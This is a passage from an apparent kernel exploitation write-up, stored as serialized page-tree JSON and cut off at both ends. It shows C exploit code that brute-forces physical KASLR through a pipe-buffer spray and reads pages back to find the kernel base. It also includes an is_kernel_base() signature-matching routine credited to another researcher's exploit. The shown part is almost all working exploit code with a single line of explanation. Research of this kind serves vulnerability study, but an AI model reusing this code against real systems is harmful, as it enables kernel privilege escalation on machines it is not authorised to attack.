kernel_base;\n",{"type":26,"tag":137,"props":61028,"children":61029},{"class":5559,"line":5642},[61030,61034,61039,61043,61047],{"type":26,"tag":137,"props":61031,"children":61032},{"style":5573},[61033],{"type":32,"value":49075},{"type":26,"tag":137,"props":61035,"children":61036},{"style":5601},[61037],{"type":32,"value":61038}," found ",{"type":26,"tag":137,"props":61040,"children":61041},{"style":5590},[61042],{"type":32,"value":289},{"type":26,"tag":137,"props":61044,"children":61045},{"style":5573},[61046],{"type":32,"value":11645},{"type":26,"tag":137,"props":61048,"children":61049},{"style":5601},[61050],{"type":32,"value":5604},{"type":26,"tag":137,"props":61052,"children":61053},{"class":5559,"line":5745},[61054,61059,61063,61068,61072,61076,61080],{"type":26,"tag":137,"props":61055,"children":61056},{"style":5573},[61057],{"type":32,"value":61058},"    uint8_t",{"type":26,"tag":137,"props":61060,"children":61061},{"style":5584},[61062],{"type":32,"value":17696},{"type":26,"tag":137,"props":61064,"children":61065},{"style":5601},[61066],{"type":32,"value":61067},"[PAGE_SIZE] ",{"type":26,"tag":137,"props":61069,"children":61070},{"style":5590},[61071],{"type":32,"value":289},{"type":26,"tag":137,"props":61073,"children":61074},{"style":5601},[61075],{"type":32,"value":47819},{"type":26,"tag":137,"props":61077,"children":61078},{"style":5626},[61079],{"type":32,"value":1817},{"type":26,"tag":137,"props":61081,"children":61082},{"style":5601},[61083],{"type":32,"value":19170},{"type":26,"tag":137,"props":61085,"children":61086},{"class":5559,"line":5850},[61087,61091,61095,61100],{"type":26,"tag":137,"props":61088,"children":61089},{"style":5682},[61090],{"type":32,"value":58109},{"type":26,"tag":137,"props":61092,"children":61093},{"style":5601},[61094],{"type":32,"value":165},{"type":26,"tag":137,"props":61096,"children":61097},{"style":6837},[61098],{"type":32,"value":61099},"\"[*] bruteforce phys-KASLR\"",{"type":26,"tag":137,"props":61101,"children":61102},{"style":5601},[61103],{"type":32,"value":6430},{"type":26,"tag":137,"props":61105,"children":61106},{"class":5559,"line":5878},[61107,61111,61115,61119,61123,61127,61131,61136,61140],{"type":26,"tag":137,"props":61108,"children":61109},{"style":5610},[61110],{"type":32,"value":5613},{"type":26,"tag":137,"props":61112,"children":61113},{"style":5601},[61114],{"type":32,"value":4625},{"type":26,"tag":137,"props":61116,"children":61117},{"style":5573},[61118],{"type":32,"value":58237},{"type":26,"tag":137,"props":61120,"children":61121},{"style":5601},[61122],{"type":32,"value":57147},{"type":26,"tag":137,"props":61124,"children":61125},{"style":5590},[61126],{"type":32,"value":289},{"type":26,"tag":137,"props":61128,"children":61129},{"style":5626},[61130],{"type":32,"value":5629},{"type":26,"tag":137,"props":61132,"children":61133},{"style":5601},[61134],{"type":32,"value":61135},";; i",{"type":26,"tag":137,"props":61137,"children":61138},{"style":5590},[61139],{"type":32,"value":53872},{"type":26,"tag":137,"props":61141,"children":61142},{"style":5601},[61143],{"type":32,"value":5742},{"type":26,"tag":137,"props":61145,"children":61146},{"class":5559,"line":5891},[61147],{"type":26,"tag":137,"props":61148,"children":61149},{"style":5601},[61150],{"type":32,"value":31781},{"type":26,"tag":137,"props":61152,"children":61153},{"class":5559,"line":5909},[61154,61159,61163,61168,61172,61177,61181,61186,61190],{"type":26,"tag":137,"props":61155,"children":61156},{"style":5601},[61157],{"type":32,"value":61158},"        kernel_base ",{"type":26,"tag":137,"props":61160,"children":61161},{"style":5590},[61162],{"type":32,"value":289},{"type":26,"tag":137,"props":61164,"children":61165},{"style":5626},[61166],{"type":32,"value":61167}," 0x40",{"type":26,"tag":137,"props":61169,"children":61170},{"style":5590},[61171],{"type":32,"value":12406},{"type":26,"tag":137,"props":61173,"children":61174},{"style":5601},[61175],{"type":32,"value":61176}," ((PHYSICAL_ALIGN ",{"type":26,"tag":137,"props":61178,"children":61179},{"style":5590},[61180],{"type":32,"value":7152},{"type":26,"tag":137,"props":61182,"children":61183},{"style":5601},[61184],{"type":32,"value":61185}," i) ",{"type":26,"tag":137,"props":61187,"children":61188},{"style":5590},[61189],{"type":32,"value":15352},{"type":26,"tag":137,"props":61191,"children":61192},{"style":5601},[61193],{"type":32,"value":61194}," PAGE_SHIFT);\n",{"type":26,"tag":137,"props":61196,"children":61197},{"class":5559,"line":5930},[61198,61203,61207,61211,61215,61220,61224],{"type":26,"tag":137,"props":61199,"children":61200},{"style":5584},[61201],{"type":32,"value":61202},"        pipebuf",{"type":26,"tag":137,"props":61204,"children":61205},{"style":5601},[61206],{"type":32,"value":16348},{"type":26,"tag":137,"props":61208,"children":61209},{"style":5584},[61210],{"type":32,"value":60925},{"type":26,"tag":137,"props":61212,"children":61213},{"style":5590},[61214],{"type":32,"value":5593},{"type":26,"tag":137,"props":61216,"children":61217},{"style":5601},[61218],{"type":32,"value":61219}," vmemmap_base ",{"type":26,"tag":137,"props":61221,"children":61222},{"style":5590},[61223],{"type":32,"value":356},{"type":26,"tag":137,"props":61225,"children":61226},{"style":5601},[61227],{"type":32,"value":61228}," kernel_base;\n",{"type":26,"tag":137,"props":61230,"children":61231},{"class":5559,"line":5939},[61232,61236,61240,61244,61248,61252],{"type":26,"tag":137,"props":61233,"children":61234},{"style":5584},[61235],{"type":32,"value":61202},{"type":26,"tag":137,"props":61237,"children":61238},{"style":5601},[61239],{"type":32,"value":16348},{"type":26,"tag":137,"props":61241,"children":61242},{"style":5584},[61243],{"type":32,"value":16492},{"type":26,"tag":137,"props":61245,"children":61246},{"style":5590},[61247],{"type":32,"value":5593},{"type":26,"tag":137,"props":61249,"children":61250},{"style":5626},[61251],{"type":32,"value":5629},{"type":26,"tag":137,"props":61253,"children":61254},{"style":5601},[61255],{"type":32,"value":5604},{"type":26,"tag":137,"props":61257,"children":61258},{"class":5559,"line":6191},[61259,61263,61267,61271,61275,61280,61284,61288],{"type":26,"tag":137,"props":61260,"children":61261},{"style":5584},[61262],{"type":32,"value":61202},{"type":26,"tag":137,"props":61264,"children":61265},{"style":5601},[61266],{"type":32,"value":16348},{"type":26,"tag":137,"props":61268,"children":61269},{"style":5584},[61270],{"type":32,"value":11727},{"type":26,"tag":137,"props":61272,"children":61273},{"style":5590},[61274],{"type":32,"value":5593},{"type":26,"tag":137,"props":61276,"children":61277},{"style":5601},[61278],{"type":32,"value":61279}," PAGE_SIZE ",{"type":26,"tag":137,"props":61281,"children":61282},{"style":5590},[61283],{"type":32,"value":356},{"type":26,"tag":137,"props":61285,"children":61286},{"style":5626},[61287],{"type":32,"value":7104},{"type":26,"tag":137,"props":61289,"children":61290},{"style":5601},[61291],{"type":32,"value":5604},{"type":26,"tag":137,"props":61293,"children":61294},{"class":5559,"line":6208},[61295],{"type":26,"tag":137,"props":61296,"children":61297},{"style":5601},[61298],{"type":32,"value":12908},{"type":26,"tag":137,"props":61300,"children":61301},{"class":5559,"line":6225},[61302,61307,61311,61315,61319,61323,61328,61332,61337,61341],{"type":26,"tag":137,"props":61303,"children":61304},{"style":5601},[61305],{"type":32,"value":61306},"        for (",{"type":26,"tag":137,"props":61308,"children":61309},{"style":5573},[61310],{"type":32,"value":21640},{"type":26,"tag":137,"props":61312,"children":61313},{"style":5584},[61314],{"type":32,"value":11209},{"type":26,"tag":137,"props":61316,"children":61317},{"style":5590},[61318],{"type":32,"value":5593},{"type":26,"tag":137,"props":61320,"children":61321},{"style":5626},[61322],{"type":32,"value":5629},{"type":26,"tag":137,"props":61324,"children":61325},{"style":5601},[61326],{"type":32,"value":61327},"; j ",{"type":26,"tag":137,"props":61329,"children":61330},{"style":5590},[61331],{"type":32,"value":8391},{"type":26,"tag":137,"props":61333,"children":61334},{"style":5601},[61335],{"type":32,"value":61336}," PIPE_SPRAY; j",{"type":26,"tag":137,"props":61338,"children":61339},{"style":5590},[61340],{"type":32,"value":53872},{"type":26,"tag":137,"props":61342,"children":61343},{"style":5601},[61344],{"type":32,"value":5742},{"type":26,"tag":137,"props":61346,"children":61347},{"class":5559,"line":6238},[61348],{"type":26,"tag":137,"props":61349,"children":61350},{"style":5601},[61351],{"type":32,"value":34254},{"type":26,"tag":137,"props":61353,"children":61354},{"class":5559,"line":6247},[61355,61360,61364,61368,61373,61377],{"type":26,"tag":137,"props":61356,"children":61357},{"style":5682},[61358],{"type":32,"value":61359},"            memset",{"type":26,"tag":137,"props":61361,"children":61362},{"style":5601},[61363],{"type":32,"value":165},{"type":26,"tag":137,"props":61365,"children":61366},{"style":5590},[61367],{"type":32,"value":5694},{"type":26,"tag":137,"props":61369,"children":61370},{"style":5601},[61371],{"type":32,"value":61372},"data, ",{"type":26,"tag":137,"props":61374,"children":61375},{"style":5626},[61376],{"type":32,"value":1817},{"type":26,"tag":137,"props":61378,"children":61379},{"style":5601},[61380],{"type":32,"value":61381},", PAGE_SIZE);\n",{"type":26,"tag":137,"props":61383,"children":61384},{"class":5559,"line":6270},[61385,61390],{"type":26,"tag":137,"props":61386,"children":61387},{"style":5573},[61388],{"type":32,"value":61389},"            int",{"type":26,"tag":137,"props":61391,"children":61392},{"style":5601},[61393],{"type":32,"value":61394}," count;\n",{"type":26,"tag":137,"props":61396,"children":61397},{"class":5559,"line":6279},[61398,61403,61408,61412,61417,61421,61426,61431,61435,61439,61443,61448,61452,61456],{"type":26,"tag":137,"props":61399,"children":61400},{"style":5610},[61401],{"type":32,"value":61402},"            if",{"type":26,"tag":137,"props":61404,"children":61405},{"style":5601},[61406],{"type":32,"value":61407}," (count ",{"type":26,"tag":137,"props":61409,"children":61410},{"style":5590},[61411],{"type":32,"value":289},{"type":26,"tag":137,"props":61413,"children":61414},{"style":5682},[61415],{"type":32,"value":61416}," read",{"type":26,"tag":137,"props":61418,"children":61419},{"style":5601},[61420],{"type":32,"value":165},{"type":26,"tag":137,"props":61422,"children":61423},{"style":5584},[61424],{"type":32,"value":61425},"pfd",{"type":26,"tag":137,"props":61427,"children":61428},{"style":5601},[61429],{"type":32,"value":61430},"[j][",{"type":26,"tag":137,"props":61432,"children":61433},{"style":5626},[61434],{"type":32,"value":1817},{"type":26,"tag":137,"props":61436,"children":61437},{"style":5601},[61438],{"type":32,"value":25640},{"type":26,"tag":137,"props":61440,"children":61441},{"style":5590},[61442],{"type":32,"value":5694},{"type":26,"tag":137,"props":61444,"children":61445},{"style":5601},[61446],{"type":32,"value":61447},"data, PAGE_SIZE) ",{"type":26,"tag":137,"props":61449,"children":61450},{"style":5590},[61451],{"type":32,"value":8391},{"type":26,"tag":137,"props":61453,"children":61454},{"style":5626},[61455],{"type":32,"value":5629},{"type":26,"tag":137,"props":61457,"children":61458},{"style":5601},[61459],{"type":32,"value":5742},{"type":26,"tag":137,"props":61461,"children":61462},{"class":5559,"line":6288},[61463],{"type":26,"tag":137,"props":61464,"children":61465},{"style":5601},[61466],{"type":32,"value":34290},{"type":26,"tag":137,"props":61468,"children":61469},{"class":5559,"line":6355},[61470,61475],{"type":26,"tag":137,"props":61471,"children":61472},{"style":5610},[61473],{"type":32,"value":61474},"                continue",{"type":26,"tag":137,"props":61476,"children":61477},{"style":5601},[61478],{"type":32,"value":5604},{"type":26,"tag":137,"props":61480,"children":61481},{"class":5559,"line":6363},[61482],{"type":26,"tag":137,"props":61483,"children":61484},{"style":5601},[61485],{"type":32,"value":61486},"            }\n",{"type":26,"tag":137,"props":61488,"children":61489},{"class":5559,"line":6393},[61490],{"type":26,"tag":137,"props":61491,"children":61492},{"style":5601},[61493],{"type":32,"value":12908},{"type":26,"tag":137,"props":61495,"children":61496},{"class":5559,"line":6401},[61497],{"type":26,"tag":137,"props":61498,"children":61499},{"emptyLinePlaceholder":18},[61500],{"type":32,"value":6276},{"type":26,"tag":137,"props":61502,"children":61503},{"class":5559,"line":6433},[61504,61509,61514,61518,61522],{"type":26,"tag":137,"props":61505,"children":61506},{"style":5601},[61507],{"type":32,"value":61508},"            if (",{"type":26,"tag":137,"props":61510,"children":61511},{"style":6009},[61512],{"type":32,"value":61513},"is_kernel_base",{"type":26,"tag":137,"props":61515,"children":61516},{"style":5601},[61517],{"type":32,"value":165},{"type":26,"tag":137,"props":61519,"children":61520},{"style":6009},[61521],{"type":32,"value":6303},{"type":26,"tag":137,"props":61523,"children":61524},{"style":5601},[61525],{"type":32,"value":61526},")) // [1] identify kernel base\n",{"type":26,"tag":137,"props":61528,"children":61529},{"class":5559,"line":6441},[61530],{"type":26,"tag":137,"props":61531,"children":61532},{"style":5601},[61533],{"type":32,"value":34290},{"type":26,"tag":137,"props":61535,"children":61536},{"class":5559,"line":6501},[61537,61542,61546,61550],{"type":26,"tag":137,"props":61538,"children":61539},{"style":5601},[61540],{"type":32,"value":61541},"                found ",{"type":26,"tag":137,"props":61543,"children":61544},{"style":5590},[61545],{"type":32,"value":289},{"type":26,"tag":137,"props":61547,"children":61548},{"style":5573},[61549],{"type":32,"value":15060},{"type":26,"tag":137,"props":61551,"children":61552},{"style":5601},[61553],{"type":32,"value":5604},{"type":26,"tag":137,"props":61555,"children":61556},{"class":5559,"line":11634},[61557,61562],{"type":26,"tag":137,"props":61558,"children":61559},{"style":5610},[61560],{"type":32,"value":61561},"                break",{"type":26,"tag":137,"props":61563,"children":61564},{"style":5601},[61565],{"type":32,"value":5604},{"type":26,"tag":137,"props":61567,"children":61568},{"class":5559,"line":11652},[61569],{"type":26,"tag":137,"props":61570,"children":61571},{"style":5601},[61572],{"type":32,"value":61486},{"type":26,"tag":137,"props":61574,"children":61575},{"class":5559,"line":11697},[61576],{"type":26,"tag":137,"props":61577,"children":61578},{"style":5601},[61579],{"type":32,"value":5936},{"type":26,"tag":137,"props":61581,"children":61582},{"class":5559,"line":11803},[61583],{"type":26,"tag":137,"props":61584,"children":61585},{"emptyLinePlaceholder":18},[61586],{"type":32,"value":6276},{"type":26,"tag":137,"props":61588,"children":61589},{"class":5559,"line":26089},[61590],{"type":26,"tag":137,"props":61591,"children":61592},{"style":5601},[61593],{"type":32,"value":12908},{"type":26,"tag":35,"props":61595,"children":61596},{},[61597,61599,61603,61605,61611,61613,61617],{"type":32,"value":61598},"Notice that at ",{"type":26,"tag":137,"props":61600,"children":61601},{},[61602],{"type":32,"value":878},{"type":32,"value":61604}," we call the ",{"type":26,"tag":130,"props":61606,"children":61608},{"className":61607},[],[61609],{"type":32,"value":61610},"is_kernel_base()",{"type":32,"value":61612}," function. This is a function based on lau's exploit ",{"type":26,"tag":137,"props":61614,"children":61615},{},[61616],{"type":32,"value":20701},{"type":32,"value":61618}," that basically matches for multiple byte patterns that may exist at the kernel base page across different builds, to maximize compatibility.",{"type":26,"tag":5512,"props":61620,"children":61622},{"className":31704,"code":61621,"language":31706,"meta":7,"style":7},"[...]\nstatic bool is_kernel_base(unsigned char *addr)\n{\n    // thanks lau :)\n\n    // get-sig kernel_runtime_1\n    if (memcmp(addr + 0x0, \"\\x48\\x8d\\x25\\x51\\x3f\", 5) == 0 &&\n        memcmp(addr + 0x7, \"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff\", 7) == 0)\n        return true;\n\n    // get-sig kernel_runtime_2\n    if (memcmp(addr + 0x0, \"\\xfc\\x0f\\x01\\x15\", 4) == 0 &&\n        memcmp(addr + 0x8, \"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf\", 12) == 0 &&\n        memcmp(addr + 0x18, \"\\x89\\xde\\x8b\\x0d\", 4) == 0 &&\n        memcmp(addr + 0x20, \"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc\", 6) == 0 &&\n        memcmp(addr + 0x2a, \"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00\", 24) == 0 &&\n        memcmp(addr + 0x45, \"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00\", 15) == 0 &&\n        memcmp(addr + 0x55, \"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8\", 8) == 0 &&\n        memcmp(addr + 0x61, \"\\x31\\xd2\\x0f\\x30\\xe8\", 5) == 0 &&\n        memcmp(addr + 0x6a, \"\\x48\\xc7\\xc6\", 3) == 0 &&\n        memcmp(addr + 0x71, \"\\x48\\xc7\\xc0\\x80\\x00\\x00\", 6) == 0 &&\n        memcmp(addr + 0x78, \"\\xff\\xe0\", 2) == 0)\n        return true;\n\n    return false;\n}\n[...]\n",[61623],{"type":26,"tag":130,"props":61624,"children":61625},{"__ignoreMap":7},[61626,61633,61663,61670,61678,61685,61693,61764,61826,61841,61848,61856,61924,61986,62047,62108,62170,62232,62293,62354,62415,62476,62537,62552,62559,62574,62581],{"type":26,"tag":137,"props":61627,"children":61628},{"class":5559,"line":5560},[61629],{"type":26,"tag":137,"props":61630,"children":61631},{"style":5601},[61632],{"type":32,"value":12908},{"type":26,"tag":137,"props":61634,"children":61635},{"class":5559,"line":5412},[61636,61641,61646,61651,61655,61659],{"type":26,"tag":137,"props":61637,"children":61638},{"style":5601},[61639],{"type":32,"value":61640},"static bool is_kernel_base(",{"type":26,"tag":137,"props":61642,"children":61643},{"style":5573},[61644],{"type":32,"value":61645},"unsigned",{"type":26,"tag":137,"props":61647,"children":61648},{"style":5573},[61649],{"type":32,"value":61650}," char",{"type":26,"tag":137,"props":61652,"children":61653},{"style":5573},[61654],{"type":32,"value":12406},{"type":26,"tag":137,"props":61656,"children":61657},{"style":5584},[61658],{"type":32,"value":33281},{"type":26,"tag":137,"props":61660,"children":61661},{"style":5601},[61662],{"type":32,"value":5742},{"type":26,"tag":137,"props":61664,"children":61665},{"class":5559,"line":5417},[61666],{"type":26,"tag":137,"props":61667,"children":61668},{"style":5601},[61669],{"type":32,"value":13471},{"type":26,"tag":137,"props":61671,"children":61672},{"class":5559,"line":5642},[61673],{"type":26,"tag":137,"props":61674,"children":61675},{"style":5564},[61676],{"type":32,"value":61677},"    // thanks lau :)\n",{"type":26,"tag":137,"props":61679,"children":61680},{"class":5559,"line":5745},[61681],{"type":26,"tag":137,"props":61682,"children":61683},{"emptyLinePlaceholder":18},[61684],{"type":32,"value":6276},{"type":26,"tag":137,"props":61686,"children":61687},{"class":5559,"line":5850},[61688],{"type":26,"tag":137,"props":61689,"children":61690},{"style":5564},[61691],{"type":32,"value":61692},"    // get-sig kernel_runtime_1\n",{"type":26,"tag":137,"props":61694,"children":61695},{"class":5559,"line":5878},[61696,61700,61704,61709,61714,61718,61723,61727,61731,61736,61740,61744,61748,61752,61756,61760],{"type":26,"tag":137,"props":61697,"children":61698},{"style":5610},[61699],{"type":32,"value":14870},{"type":26,"tag":137,"props":61701,"children":61702},{"style":5601},[61703],{"type":32,"value":4625},{"type":26,"tag":137,"props":61705,"children":61706},{"style":5682},[61707],{"type":32,"value":61708},"memcmp",{"type":26,"tag":137,"props":61710,"children":61711},{"style":5601},[61712],{"type":32,"value":61713},"(addr ",{"type":26,"tag":137,"props":61715,"children":61716},{"style":5590},[61717],{"type":32,"value":356},{"type":26,"tag":137,"props":61719,"children":61720},{"style":5626},[61721],{"type":32,"value":61722}," 0x0",{"type":26,"tag":137,"props":61724,"children":61725},{"style":5601},[61726],{"type":32,"value":1108},{"type":26,"tag":137,"props":61728,"children":61729},{"style":6837},[61730],{"type":32,"value":22653},{"type":26,"tag":137,"props":61732,"children":61733},{"style":50975},[61734],{"type":32,"value":61735},"\\x48\\x8d\\x25\\x51\\x3f",{"type":26,"tag":137,"props":61737,"children":61738},{"style":6837},[61739],{"type":32,"value":22653},{"type":26,"tag":137,"props":61741,"children":61742},{"style":5601},[61743],{"type":32,"value":1108},{"type":26,"tag":137,"props":61745,"children":61746},{"style":5626},[61747],{"type":32,"value":20701},{"type":26,"tag":137,"props":61749,"children":61750},{"style":5601},[61751],{"type":32,"value":5671},{"type":26,"tag":137,"props":61753,"children":61754},{"style":5590},[61755],{"type":32,"value":11161},{"type":26,"tag":137,"props":61757,"children":61758},{"style":5626},[61759],{"type":32,"value":5629},{"type":26,"tag":137,"props":61761,"children":61762},{"style":5590},[61763],{"type":32,"value":55287},{"type":26,"tag":137,"props":61765,"children":61766},{"class":5559,"line":5891},[61767,61772,61776,61780,61785,61789,61793,61798,61802,61806,61810,61814,61818,61822],{"type":26,"tag":137,"props":61768,"children":61769},{"style":5682},[61770],{"type":32,"value":61771},"        memcmp",{"type":26,"tag":137,"props":61773,"children":61774},{"style":5601},[61775],{"type":32,"value":61713},{"type":26,"tag":137,"props":61777,"children":61778},{"style":5590},[61779],{"type":32,"value":356},{"type":26,"tag":137,"props":61781,"children":61782},{"style":5626},[61783],{"type":32,"value":61784}," 0x7",{"type":26,"tag":137,"props":61786,"children":61787},{"style":5601},[61788],{"type":32,"value":1108},{"type":26,"tag":137,"props":61790,"children":61791},{"style":6837},[61792],{"type":32,"value":22653},{"type":26,"tag":137,"props":61794,"children":61795},{"style":50975},[61796],{"type":32,"value":61797},"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff",{"type":26,"tag":137,"props":61799,"children":61800},{"style":6837},[61801],{"type":32,"value":22653},{"type":26,"tag":137,"props":61803,"children":61804},{"style":5601},[61805],{"type":32,"value":1108},{"type":26,"tag":137,"props":61807,"children":61808},{"style":5626},[61809],{"type":32,"value":375},{"type":26,"tag":137,"props":61811,"children":61812},{"style":5601},[61813],{"type":32,"value":5671},{"type":26,"tag":137,"props":61815,"children":61816},{"style":5590},[61817],{"type":32,"value":11161},{"type":26,"tag":137,"props":61819,"children":61820},{"style":5626},[61821],{"type":32,"value":5629},{"type":26,"tag":137,"props":61823,"children":61824},{"style":5601},[61825],{"type":32,"value":5742},{"type":26,"tag":137,"props":61827,"children":61828},{"class":5559,"line":5909},[61829,61833,61837],{"type":26,"tag":137,"props":61830,"children":61831},{"style":5610},[61832],{"type":32,"value":18336},{"type":26,"tag":137,"props":61834,"children":61835},{"style":5573},[61836],{"type":32,"value":15060},{"type":26,"tag":137,"props":61838,"children":61839},{"style":5601},[61840],{"type":32,"value":5604},{"type":26,"tag":137,"props":61842,"children":61843},{"class":5559,"line":5930},[61844],{"type":26,"tag":137,"props":61845,"children":61846},{"emptyLinePlaceholder":18},[61847],{"type":32,"value":6276},{"type":26,"tag":137,"props":61849,"children":61850},{"class":5559,"line":5939},[61851],{"type":26,"tag":137,"props":61852,"children":61853},{"style":5564},[61854],{"type":32,"value":61855},"    // get-sig kernel_runtime_2\n",{"type":26,"tag":137,"props":61857,"children":61858},{"class":5559,"line":6191},[61859,61863,61867,61871,61875,61879,61883,61887,61891,61896,61900,61904,61908,61912,61916,61920],{"type":26,"tag":137,"props":61860,"children":61861},{"style":5610},[61862],{"type":32,"value":14870},{"type":26,"tag":137,"props":61864,"children":61865},{"style":5601},[61866],{"type":32,"value":4625},{"type":26,"tag":137,"props":61868,"children":61869},{"style":5682},[61870],{"type":32,"value":61708},{"type":26,"tag":137,"props":61872,"children":61873},{"style":5601},[61874],{"type":32,"value":61713},{"type":26,"tag":137,"props":61876,"children":61877},{"style":5590},[61878],{"type":32,"value":356},{"type":26,"tag":137,"props":61880,"children":61881},{"style":5626},[61882],{"type":32,"value":61722},{"type":26,"tag":137,"props":61884,"children":61885},{"style":5601},[61886],{"type":32,"value":1108},{"type":26,"tag":137,"props":61888,"children":61889},{"style":6837},[61890],{"type":32,"value":22653},{"type":26,"tag":137,"props":61892,"children":61893},{"style":50975},[61894],{"type":32,"value":61895},"\\xfc\\x0f\\x01\\x15",{"type":26,"tag":137,"props":61897,"children":61898},{"style":6837},[61899],{"type":32,"value":22653},{"type":26,"tag":137,"props":61901,"children":61902},{"style":5601},[61903],{"type":32,"value":1108},{"type":26,"tag":137,"props":61905,"children":61906},{"style":5626},[61907],{"type":32,"value":3235},{"type":26,"tag":137,"props":61909,"children":61910},{"style":5601},[61911],{"type":32,"value":5671},{"type":26,"tag":137,"props":61913,"children":61914},{"style":5590},[61915],{"type":32,"value":11161},{"type":26,"tag":137,"props":61917,"children":61918},{"style":5626},[61919],{"type":32,"value":5629},{"type":26,"tag":137,"props":61921,"children":61922},{"style":5590},[61923],{"type":32,"value":55287},{"type":26,"tag":137,"props":61925,"children":61926},{"class":5559,"line":6208},[61927,61931,61935,61939,61944,61948,61952,61957,61961,61965,61970,61974,61978,61982],{"type":26,"tag":137,"props":61928,"children":61929},{"style":5682},[61930],{"type":32,"value":61771},{"type":26,"tag":137,"props":61932,"children":61933},{"style":5601},[61934],{"type":32,"value":61713},{"type":26,"tag":137,"props":61936,"children":61937},{"style":5590},[61938],{"type":32,"value":356},{"type":26,"tag":137,"props":61940,"children":61941},{"style":5626},[61942],{"type":32,"value":61943}," 0x8",{"type":26,"tag":137,"props":61945,"children":61946},{"style":5601},[61947],{"type":32,"value":1108},{"type":26,"tag":137,"props":61949,"children":61950},{"style":6837},[61951],{"type":32,"value":22653},{"type":26,"tag":137,"props":61953,"children":61954},{"style":50975},[61955],{"type":32,"value":61956},"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf",{"type":26,"tag":137,"props":61958,"children":61959},{"style":6837},[61960],{"type":32,"value":22653},{"type":26,"tag":137,"props":61962,"children":61963},{"style":5601},[61964],{"type":32,"value":1108},{"type":26,"tag":137,"props":61966,"children":61967},{"style":5626},[61968],{"type":32,"value":61969},"12",{"type":26,"tag":137,"props":61971,"children":61972},{"style":5601},[61973],{"type":32,"value":5671},{"type":26,"tag":137,"props":61975,"children":61976},{"style":5590},[61977],{"type":32,"value":11161},{"type":26,"tag":137,"props":61979,"children":61980},{"style":5626},[61981],{"type":32,"value":5629},{"type":26,"tag":137,"props":61983,"children":61984},{"style":5590},[61985],{"type":32,"value":55287},{"type":26,"tag":137,"props":61987,"children":61988},{"class":5559,"line":6225},[61989,61993,61997,62001,62006,62010,62014,62019,62023,62027,62031,62035,62039,62043],{"type":26,"tag":137,"props":61990,"children":61991},{"style":5682},[61992],{"type":32,"value":61771},{"type":26,"tag":137,"props":61994,"children":61995},{"style":5601},[61996],{"type":32,"value":61713},{"type":26,"tag":137,"props":61998,"children":61999},{"style":5590},[62000],{"type":32,"value":356},{"type":26,"tag":137,"props":62002,"children":62003},{"style":5626},[62004],{"type":32,"value":62005}," 0x18",{"type":26,"tag":137,"props":62007,"children":62008},{"style":5601},[62009],{"type":32,"value":1108},{"type":26,"tag":137,"props":62011,"children":62012},{"style":6837},[62013],{"type":32,"value":22653},{"type":26,"tag":137,"props":62015,"children":62016},{"style":50975},[62017],{"type":32,"value":62018},"\\x89\\xde\\x8b\\x0d",{"type":26,"tag":137,"props":62020,"children":62021},{"style":6837},[62022],{"type":32,"value":22653},{"type":26,"tag":137,"props":62024,"children":62025},{"style":5601},[62026],{"type":32,"value":1108},{"type":26,"tag":137,"props":62028,"children":62029},{"style":5626},[62030],{"type":32,"value":3235},{"type":26,"tag":137,"props":62032,"children":62033},{"style":5601},[62034],{"type":32,"value":5671},{"type":26,"tag":137,"props":62036,"children":62037},{"style":5590},[62038],{"type":32,"value":11161},{"type":26,"tag":137,"props":62040,"children":62041},{"style":5626},[62042],{"type":32,"value":5629},{"type":26,"tag":137,"props":62044,"children":62045},{"style":5590},[62046],{"type":32,"value":55287},{"type":26,"tag":137,"props":62048,"children":62049},{"class":5559,"line":6238},[62050,62054,62058,62062,62067,62071,62075,62080,62084,62088,62092,62096,62100,62104],{"type":26,"tag":137,"props":62051,"children":62052},{"style":5682},[62053],{"type":32,"value":61771},{"type":26,"tag":137,"props":62055,"children":62056},{"style":5601},[62057],{"type":32,"value":61713},{"type":26,"tag":137,"props":62059,"children":62060},{"style":5590},[62061],{"type":32,"value":356},{"type":26,"tag":137,"props":62063,"children":62064},{"style":5626},[62065],{"type":32,"value":62066}," 0x20",{"type":26,"tag":137,"props":62068,"children":62069},{"style":5601},[62070],{"type":32,"value":1108},{"type":26,"tag":137,"props":62072,"children":62073},{"style":6837},[62074],{"type":32,"value":22653},{"type":26,"tag":137,"props":62076,"children":62077},{"style":50975},[62078],{"type":32,"value":62079},"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc",{"type":26,"tag":137,"props":62081,"children":62082},{"style":6837},[62083],{"type":32,"value":22653},{"type":26,"tag":137,"props":62085,"children":62086},{"style":5601},[62087],{"type":32,"value":1108},{"type":26,"tag":137,"props":62089,"children":62090},{"style":5626},[62091],{"type":32,"value":21013},{"type":26,"tag":137,"props":62093,"children":62094},{"style":5601},[62095],{"type":32,"value":5671},{"type":26,"tag":137,"props":62097,"children":62098},{"style":5590},[62099],{"type":32,"value":11161},{"type":26,"tag":137,"props":62101,"children":62102},{"style":5626},[62103],{"type":32,"value":5629},{"type":26,"tag":137,"props":62105,"children":62106},{"style":5590},[62107],{"type":32,"value":55287},{"type":26,"tag":137,"props":62109,"children":62110},{"class":5559,"line":6247},[62111,62115,62119,62123,62128,62132,62136,62141,62145,62149,62154,62158,62162,62166],{"type":26,"tag":137,"props":62112,"children":62113},{"style":5682},[62114],{"type":32,"value":61771},{"type":26,"tag":137,"props":62116,"children":62117},{"style":5601},[62118],{"type":32,"value":61713},{"type":26,"tag":137,"props":62120,"children":62121},{"style":5590},[62122],{"type":32,"value":356},{"type":26,"tag":137,"props":62124,"children":62125},{"style":5626},[62126],{"type":32,"value":62127}," 